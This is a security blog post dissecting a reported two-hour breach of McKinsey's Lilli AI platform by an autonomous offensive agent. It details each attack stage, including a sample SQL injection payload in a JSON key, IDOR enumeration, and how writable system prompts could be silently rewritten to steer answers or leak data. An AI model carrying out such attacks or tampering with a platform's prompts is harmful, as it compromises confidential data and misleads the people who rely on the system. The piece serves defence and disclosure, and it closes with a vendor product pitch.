How McKinsey's AI Was Hacked in Two Hours — And What Nobody Is Saying About It

TL;DR

→ 22 unauthenticated endpoints out of 200+ were publicly documented — for over two years
→ SQL injection was hiding in JSON key names, not values — a blind spot in every major scanner including OWASP ZAP
→ IDOR chaining let the agent walk individual user records sequentially
→ 95 system prompts — the behavioral rules of the AI — were stored in the same writable database as user data
→ This is the third major AI platform breach in three months. It is a pattern, not an anomaly.

A note on sources

CodeWall is both the researcher that found this breach and the commercial vendor selling autonomous offensive security tooling. Every secondary source — Outpost24, Treblle, coki.jp, Qiita — is citing CodeWall's own blog. The technical facts are consistent across all sources and appear credible. But the framing — "AI hacked McKinsey" — serves CodeWall's marketing. We will distinguish between verified facts and commercially motivated narrative throughout this piece. This analysis cross-references six sources across English and Japanese.

What Is Lilli, and Why Should You Care?

Lilli is McKinsey & Company's internal AI platform. Named after Lillian Dombrowski — the firm's first professional female hire in 1945 — it launched in 2023 as an enterprise RAG system built to help 43,000+ consultants synthesize institutional knowledge, retrieve past engagement documents, draft deliverables, and query proprietary methodologies. Think of it as a private ChatGPT trained on McKinsey's entire institutional memory: decades of strategy decks, financial models, due diligence reports, and client-confidential data.

By the time of the breach, more than 70% of the firm's staff used Lilli, processing over 500,000 prompts per month. It was not a side project. It was the nervous system of the most influential consulting firm on earth.

As a RAG platform, Lilli's core loop is straightforward: consultant asks a question, the system retrieves relevant document chunks from a vector store, those chunks are injected into the LLM context, and the model generates a response grounded in McKinsey's internal knowledge. This architecture is what makes the platform extraordinarily valuable — and, as it turns out, extraordinarily dangerous when the surrounding API layer is left wide open.

The Attacker Was Not a Team. It Was a Script.

CodeWall is a UK cybersecurity startup that builds AI-powered offensive security tools. Their agent does not operate like a penetration testing script running through a checklist. It reasons about a target autonomously: mapping attack surface, forming hypotheses, generating payloads, interpreting error responses, and refining its approach across multiple iterations. No human in the loop.

Here is the part that matters: the AI agent autonomously read McKinsey's own public responsible disclosure policy and recent Lilli update announcements to select it as a target. McKinsey's transparency about their platform literally became an input to the attack selection process. The Japanese security blog coki.jp was the first to flag this detail — most English-language coverage missed it entirely.

The breach was not a nation-state operation. It was not a team of senior red-teamers working through the night. A script woke up, found its way in, read the entire database, and was finished before most people had their morning coffee.

The Attack: Four Stages, Two Hours

Stage 1 — Surface Mapping (Minutes 0–15)

The agent's first move was reconnaissance. It discovered that Lilli's API documentation was publicly accessible — a common oversight when internal tools are built by product teams who treat documentation as a developer convenience rather than a security boundary.

The docs exposed the full API surface: over 200 endpoints with their expected parameters, authentication requirements, and response shapes. The agent parsed this documentation and immediately identified 22 endpoints that required no authentication. One of those endpoints accepted user search queries and — critically — wrote them directly to the database.

What the agent found in the API docs

GET /api/health — no auth

GET /api/docs — no auth (returned THIS document)

POST /api/search — no auth ⚠

GET /api/users/{id} — no auth ⚠

GET /api/workspaces/{id} — no auth ⚠

... 17 more unauthenticated endpoints

Attack surface mapped. 22 targets. Proceeding.

This maps directly to OWASP API9:2023 — Improper Inventory Management. Undocumented or forgotten endpoints without the same security controls as the main surface. The fact that the documentation itself was public made the agent's job trivial — the attack surface was self-describing.

Stage 2 — The Injection Nobody Was Looking For (Minutes 15–45)

This is where the attack gets technically interesting — and where most commentary oversimplifies it.

The vulnerable endpoint accepted JSON request bodies. The developers had done the right thing with parameterized queries — the values were safe. But the JSON key names — the field identifiers themselves — were concatenated directly into the SQL statement. When the agent sent malformed key names, the database reflected them verbatim in its error messages.

The Qiita technical breakdown by kai_kou makes this concrete:

-- SAFE: values are parameterized
INSERT INTO searches (query) VALUES ($1)

-- VULNERABLE: JSON key names concatenated directly
INSERT INTO searches ({json_key}) VALUES ($1)

-- Attacker sends:
{"query); DROP TABLE users; --": "value"}

The database error messages contained the injected key names verbatim. The agent used this as an oracle — each error response revealed schema details that informed the next payload. After 15 blind iterations, it had achieved full read-and-write access to the production database.

Fifteen iterations. No credentials. No human guiding it.

Why did every scanner miss this? OWASP ZAP, Burp Suite, and most DAST tools fuzz parameter values. They do not systematically mutate JSON key names, because that is not how APIs are typically consumed. The attack surface existed in a blind spot that developers left open and tools never checked. As one Qiita commenter put it: the team had "thoroughly checked the door lock while leaving the back handle exposed."

This maps to OWASP A03:2021 — Injection, but specifically the key-name injection subvariant that sits outside most scanner rulesets. If your security tooling is not testing JSON key names as potential injection vectors, you have this same vulnerability and you do not know it.

Stage 3 — Walking the Database via IDOR (Minutes 45–90)

With database access established, the agent combined the SQL injection with a second vulnerability: Insecure Direct Object References (IDOR). Several endpoints returned records by numeric or UUID identifiers with no ownership check. /api/users/1, /api/users/2, /api/users/3 — each one returned a full user profile for any caller, authenticated or not.

The agent enumerated user IDs sequentially, harvesting search histories, workspace memberships, and associated AI assistant configurations. Combined with the SQL injection giving direct table access, it could read what every individual consultant had been asking Lilli — what deals they were researching, what strategies they were evaluating, which clients they were working for. This is OWASP API1:2023 — Broken Object Level Authorization.

The combination of two individually "low-severity" findings — a SQL injection variant and an IDOR — created a complete, unrestricted data pipeline.

Stage 4 — The Prompt Layer Compromise (Minutes 90–120)

This is the part that separates an AI platform breach from a classical database breach, and the part that most English-language coverage underplays.

Lilli's system prompts — the rules that define how the AI answers questions, which guardrails constrain it, how it cites sources, what persona it adopts — were stored in the same database as everything else. Ninety-five prompts across twelve model types. Sitting in a regular SQL table. With write permissions available to anyone who had cleared the injection barrier.

An attacker could have issued a single UPDATE statement via an HTTP request and changed how Lilli answered every question from that point forward. No code deployment. No detectable system change. Just silent behavioral drift.

The coki.jp analyst put it starkly in Japanese: the system prompts that controlled Lilli's behavior were stored in the same compromised database, and an attacker rewriting them would silently alter the "thinking circuits" (思考回路) of an AI used by over 40,000 employees — causing the entire organization to be led toward wrong decisions, the more they trusted and relied on the AI.

Think about what that means for a consulting firm. Lilli could have been quietly instructed to exfiltrate financial data mentioned in conversation. To subtly steer M&A recommendations. To embed confidential client information in seemingly innocuous responses. To strip its own safety guardrails. And unlike a compromised server, a modified prompt leaves no log trail. No file changes. No process anomalies. The application reads its instructions from the database and follows them. The instructions just are not the original ones anymore.

This maps to the OWASP Top 10 for Agentic Applications 2026 — specifically "Agent Goal Hijack" — a category that did not exist in classical web security frameworks because classical web applications do not have behavioral instructions that can be rewritten at the data layer.

This did not happen. But the access was there.

What Was Exposed

46.5M

Chat messages

Strategy discussions, financial data

3.68M

RAG document chunks

Unencrypted knowledge base

728K

Internal files

PDFs, Excel, PowerPoint, Word

57K

User accounts

Full profiles + search history

384K

AI assistants

94K configured workspaces

System prompts

Lilli's behavioral controls

The Uncomfortable Questions Nobody Is Asking

Most coverage of this breach treats it as an AI story. It is not. It is a governance story. The technical vulnerabilities — SQL injection, IDOR, unauthenticated endpoints — are twenty-year-old problems. The question worth asking is not "how did the agent find these?" but "how did these exist for over two years in a system serving 43,000 people at the world's most prestigious consulting firm?"

1. Twenty-two naked endpoints for two years. Where was the inventory?

Twenty-two of 200+ endpoints had no authentication. For more than two years. In a system handling M&A discussions and client strategy. This is not a coding error. It is the absence of a process. Somebody built those endpoints without auth — almost certainly for development convenience — and no systematic API inventory review ever caught them. No automated enforcement. No "no unauthenticated production endpoint" policy. Nothing.

Here is the part that should sting: in October 2025, McKinsey published a report explicitly warning that "agentic AI would become a new entry point for cyberattacks." The risk they described publicly to their clients is the exact risk that brought down their own flagship system five months later.

2. The developer knew enough to be dangerous

The developer who built the search endpoint parameterized the query values correctly. They knew about SQL injection. They applied the standard defense. But they did not know — or did not consider — that JSON key names are equally injectable when used as SQL identifiers. Standard code review checklists do not test this pattern. Standard SAST tools do not flag it. This is a training and tooling gap, not negligence. But it is a gap that existed across the entire security stack for years.

3. System prompts in the main database. Why?

Ninety-five system prompts stored in the same relational database as 46.5 million chat messages, with the same write permissions. This is architectural naïveté — treating AI configuration as just another database table.

When an AI platform stores its configuration alongside user data, write access becomes something fundamentally different from a traditional database breach. An attacker who can write to your session table can hijack logins; the damage is real but contained and visible. An attacker who can write to system prompts can corrupt the advice that thousands of consultants receive — without leaving any trace in application logs.

There is no evidence McKinsey had a threat model for this attack class. The architectural decision to co-locate prompts with user data was almost certainly made without considering the AI-specific risk surface.

4. Public API docs for an internal system

Full API documentation with 200+ endpoints was publicly accessible without authentication. Publishing API docs publicly is a common convenience during development and often never walked back. For a consumer-facing product, this is standard. For an internal AI platform handling the institutional knowledge of the world's most influential consulting firm, it handed any attacker a complete attack surface map before they had touched a single endpoint.

5. No scanner found anything in two years of operation

McKinsey's internal security tooling found nothing. OWASP ZAP would have found nothing. Annual penetration testing apparently found nothing. The key-name SQL injection pattern sits outside most scanner rulesets. Traditional pen tests follow checklists. The checklist did not have "fuzz JSON key names as SQL identifiers" on it.

Annual static penetration testing is insufficient for detecting vulnerabilities that autonomous agents find through adaptive, iterative probing. The Qiita analysis is particularly sharp on this point: the agent completed in fifteen iterations what would take a human analyst hours of hypothesis-test-refine cycles.

The "Development Environment" Question

Unresolved ambiguity

McKinsey's remediation included taking the development environment offline and restricting public API documentation. This raises an unresolved question: was the vulnerable environment production, development, or a staging mirror? No source definitively clarifies this. If it was a staging environment with production data (a common pattern), the severity is real but the exposure model is different. All impact estimates in this article should be read with that caveat.

This Is a Pattern, Not an Anomaly

The Lilli breach is the third high-profile incident in recent months where an API security failure in an AI system led to consequences beyond typical data breach outcomes. The other two: the Anthropic distillation attacks, where researchers demonstrated systematic model extraction via API abuse; and the Moltbook session takeover, where cross-tenant session leakage exposed AI workspace contents.

In each case, the technical vulnerability was not novel. The novelty was what that vulnerability enabled in an AI-specific context. A SQL injection in a traditional CRM leaks customer records. A SQL injection in an AI platform leaks the reasoning and knowledge behind every decision the organization makes — plus the ability to silently manipulate future decisions.

Treblle's data is worth noting here: their analysis of over one billion API requests per month shows that unauthenticated endpoints remain one of the most common critical findings across enterprise APIs. Enterprises building AI-native systems are deploying them with the same security debt that plagued their pre-AI APIs — plus new configuration surfaces (system prompts, RAG pipelines, model parameters) that traditional security tooling was never built to monitor.

Gartner's projection, cited by the Japanese analysis: by 2027, more than 40% of AI-related data breaches will result from this kind of generative AI misuse.

The Democratization of Cyberattacks (サイバー攻撃の民主化)

The coki.jp analysis introduces a term that reframes the significance of this breach. In Japanese: 攻撃の民主化 — the democratization of attacks.

Previously, mounting a sophisticated attack on a McKinsey-class target required rare, expensive human expertise. That barrier has collapsed. AI agent attacks have three defining characteristics that make them categorically different from human-led attacks: machine speed — completing in minutes what a human needs days to do; infinite scalability — a single agent can be copied to simultaneously attack thousands of organizations; and continuous probing — the agent never tires, searching for gaps 24 hours a day, 365 days a year, without fatigue, distraction, or lunch breaks.

Any organization with access to an autonomous offensive agent can now probe enterprise AI systems at scale, speed, and low cost. The attack surface that was "acceptable when only a skilled human could exploit it" is no longer acceptable.

IBM's 2025 Cost of a Data Breach report quantifies the defensive corollary: organizations using AI and automation in their security operations reduce the time from breach identification to resolution by an average of 80 days, and reduce average breach costs by $1.9 million. The trajectory is clear. It is now nearly impossible for humans alone to defend against AI-speed attacks. Palo Alto Networks' Unit 42 team specifically warns of adversaries combining multiple specialized AI agents — each handling a different stage of the attack — orchestrated into a single, end-to-end automated campaign.

What We Got Wrong (Red-Teaming Our Own Narrative)

Fair analysis requires flagging where the narrative might be overstated. Three things to watch:

Contradiction resolution

Claim	Reality check
"Production database" was breached	McKinsey took the development environment offline. The vulnerable instance may have been dev/staging, not pure production. Severity may be overstated.
"No evidence client data was accessed"	Plausible but unverifiable by external parties. McKinsey has reputational incentive to minimize.
"AI was the attacker"	The AI was the discovery tool. The attack vectors (SQLi + IDOR) are fully classical. Framing AI as the attacker is CodeWall's marketing narrative, not a new vulnerability class.
46.5M chat messages "exposed"	This may be the total database size, not data that was exfiltrated. CodeWall's commercial interest is in demonstrating maximum impact.

What McKinsey Did Right

McKinsey's incident response deserves acknowledgment. Once CodeWall disclosed:

The CISO acknowledged the report the next day
Vulnerable endpoints were patched within 24 hours
The development environment was taken offline
Public API documentation access was removed

This is a textbook responsible disclosure response — fast, professional, and proportionate. The harder work — architectural changes to prompt storage, continuous endpoint inventory, AI-specific injection scanning — presumably follows. Most enterprises will not have the luxury of a responsible disclosure. They will find out a different way.

What To Do Monday Morning

Audit every AI platform for three things

Unauthenticated endpoints. Co-located prompt storage. Public API documentation. These three checks alone would have prevented this entire breach.

Validate structure, not just values

If user input ever touches an SQL identifier — table name, column name, function name — whitelist it. There is no safe way to dynamically construct SQL identifiers from untrusted input. Parameterization only covers values.

System prompts are Crown Jewel assets

Vault-encrypted. Version-controlled. Write-access restricted to platform administrators via deployment pipeline only. Read-access audited. They are the rules of your AI — treat them like your authentication configuration.

Every object access needs an ownership check

BOLA/IDOR is the #1 API vulnerability class for a reason. If an endpoint returns a record by ID, verify the caller owns it. Every time. Not just sometimes.

Run AI against your own AI

Traditional pen tests happen quarterly or annually. Autonomous agents can probe your platform continuously. If you are building an AI system, run your own autonomous red-team agent against it before someone else does. The fifteen iterations that cracked Lilli would take a human hours. The agent did it in minutes.

Apply the OWASP Agentic AI Top 10

The OWASP Top 10 for Agentic Applications 2026 formalizes the attack surface that classical OWASP frameworks do not cover. Use it as a checklist before deploying any internal AI platform.

The Real Takeaway

The McKinsey Lilli breach is not a story about sophisticated attackers exploiting exotic vulnerabilities. It is a story about what happens when AI platforms are built with web-application security practices applied to a threat model that web applications do not face.

The same patterns that let a developer ship a feature in a day — skip the auth middleware for now, use the JSON key directly, store the config in the main database — become catastrophic liabilities at the scale and sensitivity of an enterprise AI platform. And with autonomous AI agents that can probe an entire documented API surface in minutes, the window between "deployed" and "exploited" is now measured in hours, not months.

AI prompts are the new Crown Jewel assets. They are stored in databases, passed through APIs, cached in config files. They rarely have access controls, version history, or integrity monitoring. Yet they control the output that employees trust, that clients receive, and that decisions are built on. A modified system prompt leaves no audit trail. No file changes. No process anomalies. The application reads its instructions and follows them. The instructions just are not the original ones anymore.

The question is not whether your AI platform has vulnerabilities like these. The question is whether your own red-team finds them first.

How API Phantom Would Have Stopped This

PhantomCorgi AI Platform Security Shield

✓

Endpoint inventory

Automatically discovers and maps every API endpoint, flags any that lack authentication before deployment.

✓

Auth enforcement layer

Reverse proxy enforces authentication on every request. Unauthenticated calls are rejected at the edge, not per-endpoint.

✓

SQL injection in JSON keys

Injection detection scans both parameter values and structural elements of JSON payloads. This exact attack pattern is in the ruleset.

✓

Prompt integrity vault

System prompts stored in a versioned, separately encrypted vault. No read-write access from the application database layer.

✓

IDOR detection

Request-level IDOR analysis cross-references the requesting identity against the record ID being accessed. Cross-user access triggers an alert and block.

✓

Autonomous red-team agent

Runs continuous AI-vs-AI probing against your own platform 24/7 — finding the unauthenticated endpoints and injection paths before someone else does.

Explore API Phantom →

Sources